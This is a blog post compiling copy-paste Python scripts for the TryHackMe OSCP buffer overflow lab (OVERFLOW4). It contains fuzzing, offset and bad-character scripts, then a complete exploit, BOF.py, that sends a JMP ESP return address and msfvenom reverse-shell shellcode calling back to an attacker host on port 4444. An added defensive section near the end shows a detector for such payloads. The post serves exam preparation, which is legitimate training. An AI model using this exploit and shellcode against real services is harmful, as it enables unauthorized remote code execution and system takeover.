Hi everyone!

This post is a compilation of the scripts from John Hammond's recent video on the TryHackMe Buffer Overflow OSCP preparation room. You can see his video here:

Anyway, I will be using the OVERFLOW4 prefix instead, so watch his video first if you haven't. The cheatsheet below lets you quickly copy, paste and change a few values, which matters especially during your OSCP exam.

Fuzzing.py

Keep increasing the offset value until EIP in Immunity Debugger reads "41414141" (four 'A' bytes), which shows the overflow has reached EIP.

#!/usr/bin/env python3
import socket

host, port = "10.10.36.169", 1337

prefix = b'OVERFLOW4 '
offset = b'A' * 4000    # raise this until EIP shows 41414141

payload = prefix + offset

with socket.socket() as s:
    s.connect((host, port))
    s.sendall(payload)

Findoffset.py

Set the pattern length to the buffer size that crashed the program during fuzzing. Remember to generate a new pattern of that length with Metasploit's pattern_create.rb.

#!/usr/bin/env python3
import socket

host, port = "10.10.36.169", 1337

prefix = b'OVERFLOW4 '
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4000
# (the 4000-byte cyclic pattern, split here by leading letter only for readability)
offset = (
    b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9'
    b'Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9'
    b'Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9'
    b'Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9'
    b'Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9'
    b'Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F'
)

payload = prefix + offset

with socket.socket() as s:
    s.connect((host, port))
    s.sendall(payload)

Findbadchars.py

Remember to update the offset value once you have found it by feeding the EIP contents to Metasploit's pattern_offset.rb.

Start with an empty badchar list and step through the bytes on the stack in the debugger to find the first bad character. Add it to the list, rerun the script, and repeat until you have checked every byte from 0x00 to 0xFF.

#!/usr/bin/env python3
import socket

host, port = "10.10.36.169", 1337

# Every byte value except 0x00, which is left out from the start.
allchar = bytearray(range(1, 256))
badchar = [b'\xA9', b'\xCD', b'\xD4']

# Strip the bad characters found so far before resending.
for char in badchar:
    allchar = allchar.replace(char, b'')

length = 4000
prefix = b'OVERFLOW4 '
offset = b'A' * 2026    # /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = b'BBBB'
remaining = b'C' * (length - len(offset) - len(RET) - len(allchar))

payload = prefix + offset + RET + allchar + remaining

with socket.socket() as s:
    s.connect((host, port))
    s.sendall(payload)

BOF.py

Remember to change the LHOST. Also, change the bad characters in the "-b" flag if you need to.

#!/usr/bin/env python3
import socket
import struct


def p32(data):
    # Pack a 32-bit address little-endian
    return struct.pack("<I", data)


host, port = "10.10.36.169", 1337

length = 4000
prefix = b"OVERFLOW4 "
offset = b'A' * 2026    # /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = p32(0x625011bb)   # !mona jmp -r esp -cpb "\x00\xA9\xCD\xD4"
NOP = b'\x90' * 32

# msfvenom -p windows/shell_reverse_tcp LHOST=10.4.39.1 LPORT=4444 EXITFUNC=thread -f py -b "\x00\xA9\xCD\xD4"
buf = b""
buf += b"\xb8\xc1\x3f\x75\x83\xdb\xdd\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x83\x31\x97"
buf += b"\x76\xff\xa6\xd5\x79\xff\x36\xba\xf0\x1a\x07\xfa\x67"
buf += b"\x6f\x38\xca\xec\x3d\xb5\xa1\xa1\xd5\x4e\xc7\x6d\xda"
buf += b"\xe7\x62\x48\xd5\xf8\xdf\xa8\x74\x7b\x22\xfd\x56\x42"
buf += b"\xed\xf0\x97\x83\x10\xf8\xc5\x5c\x5e\xaf\xf9\xe9\x2a"
buf += b"\x6c\x72\xa1\xbb\xf4\x67\x72\xbd\xd5\x36\x08\xe4\xf5"
buf += b"\xb9\xdd\x9c\xbf\xa1\x02\x98\x76\x5a\xf0\x56\x89\x8a"
buf += b"\xc8\x97\x26\xf3\xe4\x65\x36\x34\xc2\x95\x4d\x4c\x30"
buf += b"\x2b\x56\x8b\x4a\xf7\xd3\x0f\xec\x7c\x43\xeb\x0c\x50"
buf += b"\x12\x78\x02\x1d\x50\x26\x07\xa0\xb5\x5d\x33\x29\x38"
buf += b"\xb1\xb5\x69\x1f\x15\x9d\x2a\x3e\x0c\x7b\x9c\x3f\x4e"
buf += b"\x24\x41\x9a\x05\xc9\x96\x97\x44\x86\x5b\x9a\x76\x56"
buf += b"\xf4\xad\x05\x64\x5b\x06\x81\xc4\x14\x80\x56\x2a\x0f"
buf += b"\x74\xc8\xd5\xb0\x85\xc1\x11\xe4\xd5\x79\xb3\x85\xbd"
buf += b"\x79\x3c\x50\x11\x29\x92\x0b\xd2\x99\x52\xfc\xba\xf3"
buf += b"\x5c\x23\xda\xfc\xb6\x4c\x71\x07\x51\x79\x82\x20\x79"
buf += b"\x15\x88\x2e\x68\xba\x05\xc8\xe0\x52\x40\x43\x9d\xcb"
buf += b"\xc9\x1f\x3c\x13\xc4\x5a\x7e\x9f\xeb\x9b\x31\x68\x81"
buf += b"\x8f\xa6\x98\xdc\xed\x61\xa6\xca\x99\xee\x35\x91\x59"
buf += b"\x78\x26\x0e\x0e\x2d\x98\x47\xda\xc3\x83\xf1\xf8\x19"
buf += b"\x55\x39\xb8\xc5\xa6\xc4\x41\x8b\x93\xe2\x51\x55\x1b"
buf += b"\xaf\x05\x09\x4a\x79\xf3\xef\x24\xcb\xad\xb9\x9b\x85"
buf += b"\x39\x3f\xd0\x15\x3f\x40\x3d\xe0\xdf\xf1\xe8\xb5\xe0"
buf += b"\x3e\x7d\x32\x99\x22\x1d\xbd\x70\xe7\x3d\x5c\x50\x12"
buf += b"\xd6\xf9\x31\x9f\xbb\xf9\xec\xdc\xc5\x79\x04\x9d\x31"
buf += b"\x61\x6d\x98\x7e\x25\x9e\xd0\xef\xc0\xa0\x47\x0f\xc1"

remaining = b'C' * (length - len(offset) - len(RET) - len(NOP) - len(buf))

payload = prefix + offset + RET + NOP + buf + remaining

with socket.socket() as s:
    s.connect((host, port))
    s.sendall(payload)
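A defender's counterpart to the scripts above, as an added example that is not part of the original post: a small inspector that flags captured requests to the same service when they show the fuzzing, cyclic-pattern or NOP-sled stages described here. The argument-length and run-length thresholds and the sample payloads are constructed assumptions; only the OVERFLOW4 prefix comes from the post.

```python
import re
from string import ascii_lowercase, ascii_uppercase, digits

# Added example (not from the original post): an inspector a defender can run
# over captured requests to the same service. PREFIX is from the post; the
# thresholds and the sample payloads below are constructed assumptions.
PREFIX = b"OVERFLOW4 "
MAX_ARG_LEN = 1024   # assumed legitimate maximum for this command's argument
RUN_THRESHOLD = 64   # one byte repeated more than this (the b'A' * N stage)
NOP_THRESHOLD = 16   # consecutive 0x90 bytes beyond this (the NOP sled)
# pattern_create.rb emits Upper-lower-digit triplets (Aa0Aa1Aa2...).
CYCLIC_RE = re.compile(rb"(?:[A-Z][a-z][0-9]){8,}")
RUN_RE = re.compile(rb"(.)\1{%d,}" % RUN_THRESHOLD, re.DOTALL)
NOP_RE = re.compile(rb"\x90{%d,}" % NOP_THRESHOLD)

def classify_payload(data: bytes) -> list:
    """Return the findings for one captured request (empty list = benign)."""
    if not data.startswith(PREFIX):
        return ["unknown-command"]
    arg = data[len(PREFIX):]
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"oversize-argument:{len(arg)}")
    run = RUN_RE.search(arg)   # longest leading run of a single repeated byte
    if run:
        findings.append(f"byte-run:{run.group(1).hex()}x{len(run.group())}")
    if CYCLIC_RE.search(arg):
        findings.append("cyclic-pattern")
    if NOP_RE.search(arg):
        findings.append("nop-sled")
    return findings

def metasploit_pattern(length: int) -> bytes:
    """Constructed test input in the style of pattern_create.rb output."""
    out = bytearray()
    for up in ascii_uppercase:
        for lo in ascii_lowercase:
            for dg in digits:
                out += f"{up}{lo}{dg}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

# Constructed samples: a normal request and the three overflow stages above.
SAMPLES = {
    "benign": PREFIX + b"hello",
    "fuzz": PREFIX + b"A" * 4000,
    "pattern": PREFIX + metasploit_pattern(4000),
    "sled": PREFIX + b"A" * 2026 + b"BBBB" + b"\x90" * 32 + b"\xcc" * 16,
}
```

Running `classify_payload` over `SAMPLES` gives an empty list for the benign request and tags the other three with the stage they resemble.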

I hope these tips have been helpful to you. Feel free to leave any comments below. Do remove your ad-blocker to support my blog. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction and the cost of hosting the website as well as the domain name fee. The link is here. 🙂
